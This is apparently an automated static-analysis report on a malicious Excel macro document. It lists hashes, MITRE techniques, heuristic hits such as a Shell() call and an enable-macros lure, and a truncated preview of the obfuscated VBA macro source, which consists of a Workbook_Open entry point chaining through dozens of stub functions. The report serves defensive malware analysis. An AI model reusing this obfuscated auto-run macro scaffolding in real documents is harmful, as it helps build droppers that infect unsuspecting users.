Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f81f5483bbdd78d…

MALICIOUS

Office (OLE)

762.0 KB Created: 2017-08-03 19:31:19 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: 6d0fade2ea426fdc53bfcb5e875fa29c SHA-1: 346258cb2fef626a87ea35de78cd2f5bb3e3e4f8 SHA-256: 2f81f5483bbdd78d3f6c23ea164830ae263993f349842dd1d1e6e6d055822720
208 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is an Excel file containing a Workbook_Open VBA macro that utilizes the Shell() function, indicating it's designed to execute external commands. The document body explicitly prompts the user to 'enable macros for proper view!', a common social engineering tactic. The VBA code is heavily obfuscated but the presence of Shell() and the lure strongly suggest it acts as a downloader for a second-stage payload.

Heuristics 6

  • ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 103999 bytes
SHA-256: 872bbb859d8e808568d0241913f3cc374415f64cf972e66c7d99a2e49c62dd56
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRkboOK_opeN(): Call HjQtJEpdADlaPJh: End Sub
Function HjQtJEpdADlaPJh() As Currency
Call fAoPHggxuVQpqfE
End Function
Private Function fAoPHggxuVQpqfE() As Long
Call hxXtPeuinsXPNfn
End Function
Private Sub hxXtPeuinsXPNfn()
Call UbntGrmagISFqyD
End Sub
Static Function UbntGrmagISFqyD() As Boolean
Call lmOAHaCjacpGQvf
End Function
Function lmOAHaCjacpGQvf() As Integer
Call MnFxiABbJyqUIfW
End Function
Private Function MnFxiABbJyqUIfW() As Currency
Call sLZicUTHDPdxkZq
End Function
Private Function sLZicUTHDPdxkZq() As Boolean
Call iZJJweUXmivlfGZ
End Function
Static Function iZJJweUXmivlfGZ() As Single
Call PpNIFwQpACtnQid
End Function
Sub PpNIFwQpACtnQid()
Call GwgwoFvqEWWBUvw
End Sub
Private Sub GwgwoFvqEWWBUvw()
Call oETIMXVunqfcODk
End Sub
Static Function oETIMXVunqfcODk() As Currency
Call vXfZnQBTrJYSVPv
End Function
Sub vXfZnQBTrJYSVPv()
Call fXCzZhGJvesSXDS
End Sub
Sub fXCzZhGJvesSXDS()
Call mjxeQZQUUywgnvO
End Sub
Private Function mjxeQZQUUywgnvO() As Single
Call UnulpRzGhnGuHKK
End Function
Static Function UnulpRzGhnGuHKK() As Date
Call HuXlsfCJBhZOgVo
End Function
Sub HuXlsfCJBhZOgVo()
Call BIxzskfXUbAwGFN
End Sub
Function BIxzskfXUbAwGFN() As Date
Call WSOvZPYfyVhrLFf
End Function
Private Sub WSOvZPYfyVhrLFf()
Call zjcFCmrycNVARds
End Sub
Static Function zjcFCmrycNVARds() As String
Call CvhxNjZKRHQVBSy
End Function
Sub CvhxNjZKRHQVBSy()
Call NOjCUYiiFASEmgz
End Sub
Sub NOjCUYiiFASEmgz()
Call zddpImHzDtazCKt
End Sub
Private Function zddpImHzDtazCKt() As Variant
Call eeKaPHiqXolGawa
End Function
Static Sub eeKaPHiqXolGawa()
Call ywrIhnxLghGbWQI
End Sub
Sub ywrIhnxLghGbWQI()
Call ZUVFwMmtpZjLTIm
End Sub
Sub ZUVFwMmtpZjLTIm()
Call NTiTOYTheUOEBzz
End Sub
Private Sub NTiTOYTheUOEBzz()
Call XuALGOyTxLFOdgR
End Sub
Static Sub XuALGOyTxLFOdgR()
Call twBUCsUMwHwirNS
End Sub
Sub twBUCsUMwHwirNS()
Call XFzsuOSRvBwQFSP
End Sub
Function XFzsuOSRvBwQFSP()
Call qfxNxvCBjsGMsFN
End Function
Static Function qfxNxvCBjsGMsFN() As Variant
Call CqigTjpLsmUUnzy
End Function
Sub CqigTjpLsmUUnzy()
Call pxLgWwsOLhnoMKc
End Sub
Sub pxLgWwsOLhnoMKc()
Call jLlvWCVcfaOXmuB
End Sub
Function jLlvWCVcfaOXmuB() As Double
Call FVCrDhOjJUuRquT
End Function
Static Sub FVCrDhOjJUuRquT()
Call hlQBgEhDnNjawSg
End Sub
Static Function hlQBgEhDnNjawSg() As Object
Call lyVsqBPPbHdvhIm
End Function
Function lyVsqBPPbHdvhIm() As Long
Call vRXyxqYnPzfeSVo
End Function
Private Sub vRXyxqYnPzfeSVo()
Call hgRlmExEOsnZiAh
End Sub
Private Function hgRlmExEOsnZiAh() As Object
Call MhyWtZYuhoygGmO
End Function
Static Function MhyWtZYuhoygGmO() As Double
Call gyfELFnQqgUCBFw
End Function
Sub gyfELFnQqgUCBFw()
Call uCAlwsEMVcsjFgR
End Sub
Private Function uCAlwsEMVcsjFgR() As Double
Call wWWOrqImoUbfgon
End Function
Private Sub wWWOrqImoUbfgon()
Call rcgrGuQmcPNmPFw
End Sub
Static Sub rcgrGuQmcPNmPFw()
Call czpQfKKRGGKIWCG
End Sub
Static Sub czpQfKKRGGKIWCG()
Call GInoXgIWFBKqlHD
End Sub
Private Function GInoXgIWFBKqlHD() As Single
Call YhlIbNsGtsUmYuB
End Function
Private Function YhlIbNsGtsUmYuB() As Single
Call ksWcxBfQCmhuSpn
End Function
Static Sub ksWcxBfQCmhuSpn()
Call XAzcAOiSWgAPrzQ
End Sub
Function XAzcAOiSWgAPrzQ() As Integer
Call SNZrzULhpabxRjp
End Function
Private Sub SNZrzULhpabxRjp()
Call nXqmgzDoTUIsWjH
End Sub
Private Sub nXqmgzDoTUIsWjH()
Call ypkhsNUfEXOnTXA
End Sub
Private Sub yp
... (truncated)